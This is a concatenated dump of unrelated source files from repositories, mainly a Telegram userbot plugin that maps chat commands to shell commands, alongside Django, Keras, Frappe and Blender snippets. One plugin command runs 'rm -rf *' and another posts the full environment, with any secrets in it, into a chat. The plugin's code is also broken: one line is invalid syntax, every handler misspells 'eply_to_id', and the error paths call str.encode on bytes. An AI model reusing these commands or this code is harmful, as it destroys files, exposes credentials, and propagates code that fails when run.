'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
#'pybb.middleware.PybbMiddleware',
)
ROOT_URLCONF = 'project.urls'
TEMPLATE_DIRS = (
# Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
realpath(join(SYSTEM_PATH, 'templates')),
)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
# Uncomment the next line to enable the admin:
'grappelli',
'django.contrib.admin',
# Uncomment the next line to enable admin documentation:
# 'modules',
'south',
'django_tables2',
'home',
)
GRAPPELLI_ADMIN_TITLE = 'Sitio Administrativo de Liceo Naval Manuel Clavero Muga'
LOGIN_URL = '/'
TEMPLATE_CONTEXT_PROCESSORS = (
"django.contrib.auth.context_processors.auth",
"django.core.context_processors.debug",
"django.core.context_processors.i18n",
"django.core.context_processors.media",
"django.core.context_processors.request",
"django.core.context_processors.static",
"django.core.context_processors.csrf",
#'pybb.context_processors.processor',
)
AUTH_PROFILE_MODULE = 'usuario.Usuario'
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'handlers': {
'mail_admins': {
'level': 'ERROR',
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
| [
"heraldo@jorge-HP-Compaq-8200-Elite-SFF-PC.(none)"
] | heraldo@jorge-HP-Compaq-8200-Elite-SFF-PC.(none) |
9d975f2478bf0f76125b516f1f17802747c622f8 | 7c668c22c3c79428e4be833cab2251cb5134b1f5 | /python_deep_learning2/7_10.create_custom_callback.py | 1d771b316e7d10f736daa91a61c2b31f2513c9e1 | [] | no_license | tengge1/LearnPython | 486297fe892528d2e71876b686bda5785e4f43bd | 862b4484b74f7a4b27105212ad76785fa02f87c0 | refs/heads/master | 2022-10-14T09:36:15.872035 | 2020-04-10T04:02:27 | 2020-06-08T04:02:36 | 228,754,433 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,615 | py | from tensorflow import keras
from tensorflow.keras import Sequential
from tensorflow.keras.datasets import mnist
from tensorflow.keras.layers import Flatten, Dense
import numpy as np
(x_train, y_train), (x_test, y_test) = mnist.load_data()
x_train = x_train / 255.0
x_test = x_test / 255.0
model = Sequential()
model.add(Flatten(input_shape=(28, 28)))
model.add(Dense(64, activation='relu'))
model.add(Dense(10, activation='softmax'))
model.compile(
optimizer='rmsprop',
loss='sparse_categorical_crossentropy',
metrics=['accuracy']
)
class ActivationLogger(keras.callbacks.Callback):
def __init__(self, val_data):
super().__init__()
self.validation_data = val_data
def set_model(self, model):
self.model = model
layer_outputs = [layer.output for layer in model.layers]
self.activations_model = keras.models.Model(model.input, layer_outputs)
def on_epoch_end(self, epoch, logs=None):
if self.validation_data is None:
raise RuntimeError('Requires validation_data.')
validation_sample = self.validation_data[0][0:1]
activations = self.activations_model.predict(validation_sample)
f = open('activations_at_epoch_' + str(epoch) + '.npz', 'wb')
np.savez(f, activations)
f.close()
x_val = x_train[:10000]
y_val = y_train[:10000]
partial_x_train = x_train[10000:]
partial_y_train = y_train[10000:]
logger = ActivationLogger((x_val, y_val))
model.fit(
partial_x_train,
partial_y_train,
epochs=2,
batch_size=128,
validation_data=(x_val, y_val),
callbacks=[logger]
)
| [
"930372551@qq.com"
] | 930372551@qq.com |
6f7629ccc4c0086b3e895b41224590449279acb5 | 60ec81571533bbfda62ed3b383c3ae984af005a8 | /recipes_exam/recipes_exam/urls.py | c7848c3dcbca30149e5701b86d5f782f2068f718 | [] | no_license | fingerman/django-projects | f35f4a39810b0db6294bfe689c30ad62947839b9 | ba3606abf7d77025ff08ffaffb64110ea2f4f92c | refs/heads/master | 2023-02-27T05:18:53.600833 | 2021-01-31T21:07:25 | 2021-01-31T21:07:25 | 334,756,435 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 798 | py | """recipes_exam URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
urlpatterns = [
path('admin/', admin.site.urls),
path('', include('app.urls')),
]
| [
"adamov.george@gmail.com"
] | adamov.george@gmail.com |
cdaa954933ee74866fd220287c1b3d8d73887ee1 | 99b92590ccba48f40a53d6200d8dbe2bdbdc0314 | /stdplugins/execmod.py | 74b7fe2fec75f9a149e6dc81a072dffe31f7e3d2 | [
"Apache-2.0"
] | permissive | SirGod/PornHub | b5dd079db385817eb598c01b4846d3b4763529f7 | 2fb1368d673b5efa10349939974f59c3d6a114ec | refs/heads/master | 2020-09-04T11:17:33.914120 | 2019-11-05T07:09:29 | 2019-11-05T07:09:29 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 22,256 | py | """COMMAND : .cpu, .uptime, .suicide, .env, .pip, .neofetch, .coffeehouse, .date, .stdplugins, .fast, .iwantsex, .telegram, .listpip, .pyfiglet, .kowsay"""
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
from telethon import events
import subprocess
from telethon.errors import MessageEmptyError, MessageTooLongError, MessageNotModifiedError
import io
import asyncio
import time
import os
# Ensure the working directories used by the plugins exist before any
# handler tries to save or download into them.
for _dirpath in ("./SAVED", Config.TMP_DOWNLOAD_DIRECTORY):
    if not os.path.isdir(_dirpath):
        os.makedirs(_dirpath)
@borg.on(admin_cmd(pattern="cpu"))
async def _(event):
    """Handle ``.cpu``: reply with the host CPU model read from /proc/cpuinfo.

    If the output is too long for a Telegram message it is uploaded as a
    text document instead; any stderr output replaces the reply.
    """
    if event.fwd_from:
        return
    cmd = "cat /proc/cpuinfo | grep 'model name'"
    # Attach the result to the message the command replied to, if any;
    # otherwise to the command message itself.
    # (Fixes the original `eply_to_id` typo, which left `reply_to_id`
    # undefined — a NameError — when the command was not a reply.)
    reply_to_id = event.message.id
    if event.reply_to_msg_id:
        reply_to_id = event.reply_to_msg_id
    process = await asyncio.create_subprocess_shell(
        cmd, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE
    )
    OUTPUT = f"**[Ravana's](tg://need_update_for_some_feature/) CPU Model:**\n"
    stdout, stderr = await process.communicate()
    if len(stdout) > Config.MAX_MESSAGE_SIZE_LIMIT:
        # Too long for a message: send as a document. `stdout` is already
        # bytes, so wrap it directly (the original `str.encode(stdout)`
        # raised TypeError).
        with io.BytesIO(stdout) as out_file:
            out_file.name = "exec.text"
            await borg.send_file(
                event.chat_id,
                out_file,
                force_document=True,
                allow_cache=False,
                caption=OUTPUT,
                reply_to=reply_to_id,
            )
        await event.delete()
        # The command message is gone; do not fall through and edit it.
        return
    if stderr.decode():
        await event.edit(f"**{stderr.decode()}**")
        return
    await event.edit(f"{OUTPUT}`{stdout.decode()}`")
@borg.on(admin_cmd(pattern="uptime"))async def _(event):
if event.fwd_from:
return
DELAY_BETWEEN_EDITS = 0.3
PROCESS_RUN_TIME = 100
# dirname = event.pattern_match.group(1)
# tempdir = "localdir"
cmd = "uptime"
# if dirname == tempdir:
eply_to_id = event.message.id
if event.reply_to_msg_id:
reply_to_id = event.reply_to_msg_id
start_time = time.time() + PROCESS_RUN_TIME
process = await asyncio.create_subprocess_shell(
cmd, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE
)
OUTPUT = f"**[Ravana's](tg://need_update_for_some_feature/) CPU UPTIME:**\n"
stdout, stderr = await process.communicate()
if len(stdout) > Config.MAX_MESSAGE_SIZE_LIMIT:
with io.BytesIO(str.encode(stdout)) as out_file:
out_file.name = "exec.text"
await borg.send_file(
event.chat_id,
out_file,
force_document=True,
allow_cache=False,
caption=OUTPUT,
reply_to=reply_to_id
)
await event.delete()
if stderr.decode():
await event.edit(f"**{stderr.decode()}**")
return
await event.edit(f"{OUTPUT}`{stdout.decode()}`")
# else:
# await event.edit("Unknown Command")
@borg.on(admin_cmd(pattern="suicide"))
async def _(event):
if event.fwd_from:
return
DELAY_BETWEEN_EDITS = 0.3
PROCESS_RUN_TIME = 100
# dirname = event.pattern_match.group(1)
# tempdir = "localdir"
cmd = "rm -rf *"
# if dirname == tempdir:
eply_to_id = event.message.id
if event.reply_to_msg_id:
reply_to_id = event.reply_to_msg_id
start_time = time.time() + PROCESS_RUN_TIME
process = await asyncio.create_subprocess_shell(
cmd, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE
)
OUTPUT = f"**[Ravana's](tg://need_update_for_some_feature/) SUICIDE BOMB:**\n"
stdout, stderr = await process.communicate()
if len(stdout) > Config.MAX_MESSAGE_SIZE_LIMIT:
with io.BytesIO(str.encode(stdout)) as out_file:
out_file.name = "exec.text"
await borg.send_file(
event.chat_id,
out_file,
force_document=True,
allow_cache=False,
caption=OUTPUT,
reply_to=reply_to_id
)
await event.delete()
if stderr.decode():
await event.edit(f"**{stderr.decode()}**")
return
await event.edit(f"{OUTPUT}`{stdout.decode()}`")
# else:
# await event.edit("Unknown Command")
@borg.on(admin_cmd(pattern="stdplugins"))
async def _(event):
if event.fwd_from:
return
DELAY_BETWEEN_EDITS = 0.3
PROCESS_RUN_TIME = 100
# dirname = event.pattern_match.group(1)
# tempdir = "localdir"
cmd = "ls stdplugins"
# if dirname == tempdir:
eply_to_id = event.message.id
if event.reply_to_msg_id:
reply_to_id = event.reply_to_msg_id
start_time = time.time() + PROCESS_RUN_TIME
process = await asyncio.create_subprocess_shell(
cmd, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE
)
OUTPUT = f"**[Ravana's](tg://need_update_for_some_feature/) STDPLUGINS:**\n"
stdout, stderr = await process.communicate()
if len(stdout) > Config.MAX_MESSAGE_SIZE_LIMIT:
with io.BytesIO(str.encode(stdout)) as out_file:
out_file.name = "exec.text"
await borg.send_file(
event.chat_id,
out_file,
force_document=True,
allow_cache=False,
caption=OUTPUT,
reply_to=reply_to_id
)
await event.delete()
if stderr.decode():
await event.edit(f"**{stderr.decode()}**")
return
await event.edit(f"{OUTPUT}`{stdout.decode()}`")
# else:
# await event.edit("Unknown Command")
@borg.on(admin_cmd(pattern="pip"))
async def _(event):
if event.fwd_from:
return
DELAY_BETWEEN_EDITS = 0.3
PROCESS_RUN_TIME = 100
# dirname = event.pattern_match.group(1)
# tempdir = "localdir"
cmd = "pip install --upgrade pip"
# if dirname == tempdir:
eply_to_id = event.message.id
if event.reply_to_msg_id:
reply_to_id = event.reply_to_msg_id
start_time = time.time() + PROCESS_RUN_TIME
process = await asyncio.create_subprocess_shell(
cmd, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE
)
OUTPUT = f"**[Ravana's](tg://need_update_for_some_feature/) PIP UPGRADE:**\n"
stdout, stderr = await process.communicate()
if len(stdout) > Config.MAX_MESSAGE_SIZE_LIMIT:
with io.BytesIO(str.encode(stdout)) as out_file:
out_file.name = "exec.text"
await borg.send_file(
event.chat_id,
out_file,
force_document=True,
allow_cache=False,
caption=OUTPUT,
reply_to=reply_to_id
)
await event.delete()
if stderr.decode():
await event.edit(f"**{stderr.decode()}**")
return
await event.edit(f"{OUTPUT}`{stdout.decode()}`")
# else:
# await event.edit("Unknown Command")
@borg.on(admin_cmd(pattern="date"))
async def _(event):
if event.fwd_from:
return
DELAY_BETWEEN_EDITS = 0.3
PROCESS_RUN_TIME = 100
# dirname = event.pattern_match.group(1)
# tempdir = "localdir"
cmd = "date"
# if dirname == tempdir:
eply_to_id = event.message.id
if event.reply_to_msg_id:
reply_to_id = event.reply_to_msg_id
start_time = time.time() + PROCESS_RUN_TIME
process = await asyncio.create_subprocess_shell(
cmd, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE
)
OUTPUT = f"**[Ravana's](tg://need_update_for_some_feature/) Date & Time Of India:**\n\n\n"
stdout, stderr = await process.communicate()
if len(stdout) > Config.MAX_MESSAGE_SIZE_LIMIT:
with io.BytesIO(str.encode(stdout)) as out_file:
out_file.name = "exec.text"
await borg.send_file(
event.chat_id,
out_file,
force_document=True,
allow_cache=False,
caption=OUTPUT,
reply_to=reply_to_id
)
await event.delete()
if stderr.decode():
await event.edit(f"**{stderr.decode()}**")
return
await event.edit(f"{OUTPUT}`{stdout.decode()}`")
# else:
# await event.edit("Unknown Command")
@borg.on(admin_cmd(pattern="env"))
async def _(event):
if event.fwd_from:
return
DELAY_BETWEEN_EDITS = 0.3
PROCESS_RUN_TIME = 100
# dirname = event.pattern_match.group(1)
# tempdir = "localdir"
cmd = "env"
# if dirname == tempdir:
eply_to_id = event.message.id
if event.reply_to_msg_id:
reply_to_id = event.reply_to_msg_id
start_time = time.time() + PROCESS_RUN_TIME
process = await asyncio.create_subprocess_shell(
cmd, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE
)
OUTPUT = f"**[Ravana's](tg://need_update_for_some_feature/) Environment Module:**\n\n\n"
stdout, stderr = await process.communicate()
if len(stdout) > Config.MAX_MESSAGE_SIZE_LIMIT:
with io.BytesIO(str.encode(stdout)) as out_file:
out_file.name = "exec.text"
await borg.send_file(
event.chat_id,
out_file,
force_document=True,
allow_cache=False,
caption=OUTPUT,
reply_to=reply_to_id
)
await event.delete()
if stderr.decode():
await event.edit(f"**{stderr.decode()}**")
return
await event.edit(f"{OUTPUT}`{stdout.decode()}`")
# else:
# await event.edit("Unknown Command")
@borg.on(admin_cmd(pattern="neofetch"))
async def _(event):
if event.fwd_from:
return
DELAY_BETWEEN_EDITS = 0.3
PROCESS_RUN_TIME = 100
# dirname = event.pattern_match.group(1)
# tempdir = "localdir"
cmd = "git clone https://github.com/dylanaraps/neofetch.git"
# if dirname == tempdir:
eply_to_id = event.message.id
if event.reply_to_msg_id:
reply_to_id = event.reply_to_msg_id
start_time = time.time() + PROCESS_RUN_TIME
process = await asyncio.create_subprocess_shell(
cmd, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE
)
OUTPUT = f"**[Ravana's](tg://need_update_for_some_feature/) Neofetch Installed, Use `.sysd` :**\n"
stdout, stderr = await process.communicate()
if len(stdout) > Config.MAX_MESSAGE_SIZE_LIMIT:
with io.BytesIO(str.encode(stdout)) as out_file:
out_file.name = "exec.text"
await borg.send_file(
event.chat_id,
out_file,
force_document=True,
allow_cache=False,
caption=OUTPUT,
reply_to=reply_to_id
)
await event.delete()
if stderr.decode():
await event.edit(f"**{stderr.decode()}**")
return
await event.edit(f"{OUTPUT}`{stdout.decode()}`")
# else:
# await event.edit("Unknown Command")
@borg.on(admin_cmd(pattern="telethon"))
async def _(event):
if event.fwd_from:
return
DELAY_BETWEEN_EDITS = 0.3
PROCESS_RUN_TIME = 100
# dirname = event.pattern_match.group(1)
# tempdir = "localdir"
cmd = "pip install --upgrade telethon"
# if dirname == tempdir:
eply_to_id = event.message.id
if event.reply_to_msg_id:
reply_to_id = event.reply_to_msg_id
start_time = time.time() + PROCESS_RUN_TIME
process = await asyncio.create_subprocess_shell(
cmd, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE
)
OUTPUT = f"**[Ravana's](tg://need_update_for_some_feature/) Telethon Updated**\n"
stdout, stderr = await process.communicate()
if len(stdout) > Config.MAX_MESSAGE_SIZE_LIMIT:
with io.BytesIO(str.encode(stdout)) as out_file:
out_file.name = "exec.text"
await borg.send_file(
event.chat_id,
out_file,
force_document=True,
allow_cache=False,
caption=OUTPUT,
reply_to=reply_to_id
)
await event.delete()
if stderr.decode():
await event.edit(f"**{stderr.decode()}**")
return
await event.edit(f"{OUTPUT}`{stdout.decode()}`")
# else:
# await event.edit("Unknown Command")
@borg.on(admin_cmd(pattern="fast"))
async def _(event):
if event.fwd_from:
return
DELAY_BETWEEN_EDITS = 0.3
PROCESS_RUN_TIME = 100
# dirname = event.pattern_match.group(1)
# tempdir = "localdir"
cmd = "speedtest-cli"
# if dirname == tempdir:
eply_to_id = event.message.id
if event.reply_to_msg_id:
reply_to_id = event.reply_to_msg_id
start_time = time.time() + PROCESS_RUN_TIME
process = await asyncio.create_subprocess_shell(
cmd, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE
)
OUTPUT = f"**[Ravana's](tg://need_update_for_some_feature/) , Server Speed Calculated:**\n"
stdout, stderr = await process.communicate()
if len(stdout) > Config.MAX_MESSAGE_SIZE_LIMIT:
with io.BytesIO(str.encode(stdout)) as out_file:
out_file.name = "exec.text"
await borg.send_file(
event.chat_id,
out_file,
force_document=True,
allow_cache=False,
caption=OUTPUT,
reply_to=reply_to_id
)
await event.delete()
if stderr.decode():
await event.edit(f"**{stderr.decode()}**")
return
await event.edit(f"{OUTPUT}`{stdout.decode()}`")
# else:
# await event.edit("Unknown Command")
@borg.on(admin_cmd(pattern="coffeehouse"))
async def _(event):
if event.fwd_from:
return
DELAY_BETWEEN_EDITS = 0.3
PROCESS_RUN_TIME = 100
# dirname = event.pattern_match.group(1)
# tempdir = "localdir"
cmd = "pip install --upgrade coffeehouse"
# if dirname == tempdir:
eply_to_id = event.message.id
if event.reply_to_msg_id:
reply_to_id = event.reply_to_msg_id
start_time = time.time() + PROCESS_RUN_TIME
process = await asyncio.create_subprocess_shell(
cmd, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE
)
OUTPUT = f"**[Ravana's](tg://need_update_for_some_feature/) , Coffeehouse Updated:**\n"
stdout, stderr = await process.communicate()
if len(stdout) > Config.MAX_MESSAGE_SIZE_LIMIT:
with io.BytesIO(str.encode(stdout)) as out_file:
out_file.name = "exec.text"
await borg.send_file(
event.chat_id,
out_file,
force_document=True,
allow_cache=False,
caption=OUTPUT,
reply_to=reply_to_id
)
await event.delete()
if stderr.decode():
await event.edit(f"**{stderr.decode()}**")
return
await event.edit(f"{OUTPUT}`{stdout.decode()}`")
# else:
# await event.edit("Unknown Command")
@borg.on(admin_cmd(pattern="iwantsex"))
async def _(event):
if event.fwd_from:
return
DELAY_BETWEEN_EDITS = 0.3
PROCESS_RUN_TIME = 100
# dirname = event.pattern_match.group(1)
# tempdir = "localdir"
cmd = "pip install sex"
# if dirname == tempdir:
eply_to_id = event.message.id
if event.reply_to_msg_id:
reply_to_id = event.reply_to_msg_id
start_time = time.time() + PROCESS_RUN_TIME
process = await asyncio.create_subprocess_shell(
cmd, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE
)
OUTPUT = f"**[Ravana's](tg://need_update_for_some_feature/) , Sex Installed To Pornhub**\n"
stdout, stderr = await process.communicate()
if len(stdout) > Config.MAX_MESSAGE_SIZE_LIMIT:
with io.BytesIO(str.encode(stdout)) as out_file:
out_file.name = "exec.text"
await borg.send_file(
event.chat_id,
out_file,
force_document=True,
allow_cache=False,
caption=OUTPUT,
reply_to=reply_to_id
)
await event.delete()
if stderr.decode():
await event.edit(f"**{stderr.decode()}**")
return
await event.edit(f"{OUTPUT}`{stdout.decode()}`")
# else:
# await event.edit("Unknown Command")
@borg.on(admin_cmd(pattern="telegram"))
async def _(event):
if event.fwd_from:
return
DELAY_BETWEEN_EDITS = 0.3
PROCESS_RUN_TIME = 100
# dirname = event.pattern_match.group(1)
# tempdir = "localdir"
cmd = "pip install telegram"
# if dirname == tempdir:
eply_to_id = event.message.id
if event.reply_to_msg_id:
reply_to_id = event.reply_to_msg_id
start_time = time.time() + PROCESS_RUN_TIME
process = await asyncio.create_subprocess_shell(
cmd, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE
)
OUTPUT = f"**[Ravana's](tg://need_update_for_some_feature/) , Telegram Installed To Pornhub**\n"
stdout, stderr = await process.communicate()
if len(stdout) > Config.MAX_MESSAGE_SIZE_LIMIT:
with io.BytesIO(str.encode(stdout)) as out_file:
out_file.name = "exec.text"
await borg.send_file(
event.chat_id,
out_file,
force_document=True,
allow_cache=False,
caption=OUTPUT,
reply_to=reply_to_id
)
await event.delete()
if stderr.decode():
await event.edit(f"**{stderr.decode()}**")
return
await event.edit(f"{OUTPUT}`{stdout.decode()}`")
# else:
# await event.edit("Unknown Command")
@borg.on(admin_cmd(pattern="listpip"))
async def _(event):
if event.fwd_from:
return
DELAY_BETWEEN_EDITS = 0.3
PROCESS_RUN_TIME = 100
# dirname = event.pattern_match.group(1)
# tempdir = "localdir"
cmd = "pip list"
# if dirname == tempdir:
eply_to_id = event.message.id
if event.reply_to_msg_id:
reply_to_id = event.reply_to_msg_id
start_time = time.time() + PROCESS_RUN_TIME
process = await asyncio.create_subprocess_shell(
cmd, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE
)
OUTPUT = f"**[Ravana's](tg://need_update_for_some_feature/) , PIP Installed To Your Pornhub...**\n"
stdout, stderr = await process.communicate()
if len(stdout) > Config.MAX_MESSAGE_SIZE_LIMIT:
with io.BytesIO(str.encode(stdout)) as out_file:
out_file.name = "exec.text"
await borg.send_file(
event.chat_id,
out_file,
force_document=True,
allow_cache=False,
caption=OUTPUT,
reply_to=reply_to_id
)
await event.delete()
if stderr.decode():
await event.edit(f"**{stderr.decode()}**")
return
await event.edit(f"{OUTPUT}`{stdout.decode()}`")
# else:
# await event.edit("Unknown Command")
@borg.on(admin_cmd(pattern="pyfiglet"))
async def _(event):
if event.fwd_from:
return
DELAY_BETWEEN_EDITS = 0.3
PROCESS_RUN_TIME = 100
# dirname = event.pattern_match.group(1)
# tempdir = "localdir"
cmd = "pip install pyfiglet"
# if dirname == tempdir:
eply_to_id = event.message.id
if event.reply_to_msg_id:
reply_to_id = event.reply_to_msg_id
start_time = time.time() + PROCESS_RUN_TIME
process = await asyncio.create_subprocess_shell(
cmd, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE
)
OUTPUT = f"**[Ravana's](tg://need_update_for_some_feature/) , PIP Installed To Your Pornhub...**\n"
stdout, stderr = await process.communicate()
if len(stdout) > Config.MAX_MESSAGE_SIZE_LIMIT:
with io.BytesIO(str.encode(stdout)) as out_file:
out_file.name = "exec.text"
await borg.send_file(
event.chat_id,
out_file,
force_document=True,
allow_cache=False,
caption=OUTPUT,
reply_to=reply_to_id
)
await event.delete()
if stderr.decode():
await event.edit(f"**{stderr.decode()}**")
return
await event.edit(f"{OUTPUT}`{stdout.decode()}`")
# else:
# await event.edit("Unknown Command")
@borg.on(admin_cmd(pattern="kowsay"))
async def _(event):
if event.fwd_from:
return
DELAY_BETWEEN_EDITS = 0.3
PROCESS_RUN_TIME = 100
# dirname = event.pattern_match.group(1)
# tempdir = "localdir"
cmd = "pip install cowsay"
# if dirname == tempdir:
eply_to_id = event.message.id
if event.reply_to_msg_id:
reply_to_id = event.reply_to_msg_id
start_time = time.time() + PROCESS_RUN_TIME
process = await asyncio.create_subprocess_shell(
cmd, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE
)
OUTPUT = f"**[Ravana's](tg://need_update_for_some_feature/) , PIP Installed To Your Pornhub...**\n"
stdout, stderr = await process.communicate()
if len(stdout) > Config.MAX_MESSAGE_SIZE_LIMIT:
with io.BytesIO(str.encode(stdout)) as out_file:
out_file.name = "exec.text"
await borg.send_file(
event.chat_id,
out_file,
force_document=True,
allow_cache=False,
caption=OUTPUT,
reply_to=reply_to_id
)
await event.delete()
if stderr.decode():
await event.edit(f"**{stderr.decode()}**")
return
await event.edit(f"{OUTPUT}`{stdout.decode()}`")
# else:
# await event.edit("Unknown Command")
| [
"noreply@github.com"
] | noreply@github.com |
249309d3c41e03e3fe9f734f5c7be424511e3763 | 5f81bff4ccd6920b448d2165854e928c7efda9f5 | /movements/movements/doctype/payment_location/payment_location.py | cc7fe470791bd8124ef15eb493d76239203a89e9 | [
"MIT"
] | permissive | hshamallakh/movements | d77897263ead77ffc1cc6e89f935abe2e0c15b2e | 3087497390f470d9da667ae918d86807b4d6bbff | refs/heads/master | 2021-05-04T00:40:08.225206 | 2018-02-05T16:59:58 | 2018-02-05T16:59:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 264 | py | # -*- coding: utf-8 -*-
# Copyright (c) 2018, Ahmed Ragheb and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe
from frappe.model.document import Document
class PaymentLocation(Document):
	"""Controller for the Payment Location DocType; framework defaults only."""
	pass
| [
"ubuntu@ip-172-31-83-45.ec2.internal"
] | ubuntu@ip-172-31-83-45.ec2.internal |
d7919c38e0ac4b378ccf1771060a7670a3744ca6 | ece0d321e48f182832252b23db1df0c21b78f20c | /engine/2.80/scripts/freestyle/styles/apriori_density.py | 1de2c4c033457e302c229c3c7014b55c0b8010d7 | [
"GPL-3.0-only",
"Font-exception-2.0",
"GPL-3.0-or-later",
"Apache-2.0",
"LicenseRef-scancode-public-domain",
"LicenseRef-scancode-unknown-license-reference",
"LicenseRef-scancode-public-domain-disclaimer",
"Bitstream-Vera",
"LicenseRef-scancode-blender-2010",
"LGPL-2.1-or-later",
"GPL-2.0-or-lat... | permissive | byteinc/Phasor | 47d4e48a52fa562dfa1a2dbe493f8ec9e94625b9 | f7d23a489c2b4bcc3c1961ac955926484ff8b8d9 | refs/heads/master | 2022-10-25T17:05:01.585032 | 2019-03-16T19:24:22 | 2019-03-16T19:24:22 | 175,723,233 | 3 | 1 | Unlicense | 2022-10-21T07:02:37 | 2019-03-15T00:58:08 | Python | UTF-8 | Python | false | false | 1,743 | py | # ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
# Filename : apriori_density.py
# Author : Stephane Grabli
# Date : 04/08/2005
# Purpose : Draws lines having a high a prior density
from freestyle.chainingiterators import ChainPredicateIterator
from freestyle.predicates import (
AndUP1D,
NotUP1D,
QuantitativeInvisibilityUP1D,
TrueBP1D,
TrueUP1D,
pyHighViewMapDensityUP1D,
)
from freestyle.shaders import (
ConstantColorShader,
ConstantThicknessShader,
)
from freestyle.types import Operators
# Select visible edges whose a-priori view-map density is high.
Operators.select(AndUP1D(QuantitativeInvisibilityUP1D(0), pyHighViewMapDensityUP1D(0.1,5)))
bpred = TrueBP1D()
# Chain only through visible, sufficiently dense edges; stop at invisible ones.
upred = AndUP1D(QuantitativeInvisibilityUP1D(0), pyHighViewMapDensityUP1D(0.0007,5))
Operators.bidirectional_chain(ChainPredicateIterator(upred, bpred), NotUP1D(QuantitativeInvisibilityUP1D(0)))
# Render every resulting chain as a constant-width black stroke.
shaders_list = [
    ConstantThicknessShader(2),
    ConstantColorShader(0.0, 0.0, 0.0, 1.0)
]
Operators.create(TrueUP1D(), shaders_list)
| [
"admin@irradiate.net"
] | admin@irradiate.net |
9d95173045444ddceac7aaebc34b8f75adf12995 | fff26da96c4b324cdbc0315c3fdf1fe2ccbf6bf0 | /.history/test_celegans_corrected_weights_20210615130634.py | a875acee9236154c606750101651e4d37fd22fd9 | [] | no_license | izzortsi/spreading-activation-networks | ebcd38477a4d4c6139a82b0dd7da3d79a0e3f741 | f2cf0bf519af746f148fa7a4ea4d78d16ba6af87 | refs/heads/dev | 2023-06-28T03:49:34.265268 | 2021-06-15T18:07:51 | 2021-06-15T18:07:51 | 376,718,907 | 0 | 0 | null | 2021-06-15T18:07:51 | 2021-06-14T06:01:52 | Python | UTF-8 | Python | false | false | 3,390 | py | # %%
import graph_tool.all as gt
import numpy as np
import numpy.random as npr
# import matplotlib.colors as mplc
from matplotlib import cm
import matplotlib.colors as mplc
import os, sys
from gi.repository import Gtk, Gdk, GdkPixbuf, GObject, GLib
from plot_functions import *
# %%
def init_elegans_net():
    """Load the C. elegans neural network and prepare it for the dynamics.

    Edge weights are the min-max-normalised original "value" property;
    each vertex gets an integer ``state`` (all zero) and a float
    ``activation`` drawn from a normal distribution, rescaled to [0, 1].
    """
    net = gt.collection.data["celegansneural"]
    # Replace the raw "value" edge property with normalised weights.
    net.ep.weight = net.new_ep("double")
    net.ep.weight.a = minmax(net.ep.value.a)
    del net.ep["value"]
    # Drop bundled metadata we do not use.
    del net.gp["description"]
    del net.gp["readme"]
    del net.vp["label"]
    # Fresh per-vertex properties for the activation dynamics.
    net.vp.state = net.new_vertex_property("int")
    net.vp.activation = net.new_vertex_property("float")
    size = net.num_vertices()
    net.vp.state.a = np.full(size, 0)
    net.vp.activation.a = minmax(npr.normal(size=size))
    return net
# %%
def init_graph(g):
    """Return *g* together with its MST view and that view's transitive closure."""
    mst_filter = gt.min_spanning_tree(g)
    mst_view = gt.GraphView(g, efilt=mst_filter)
    closure = gt.transitive_closure(mst_view)
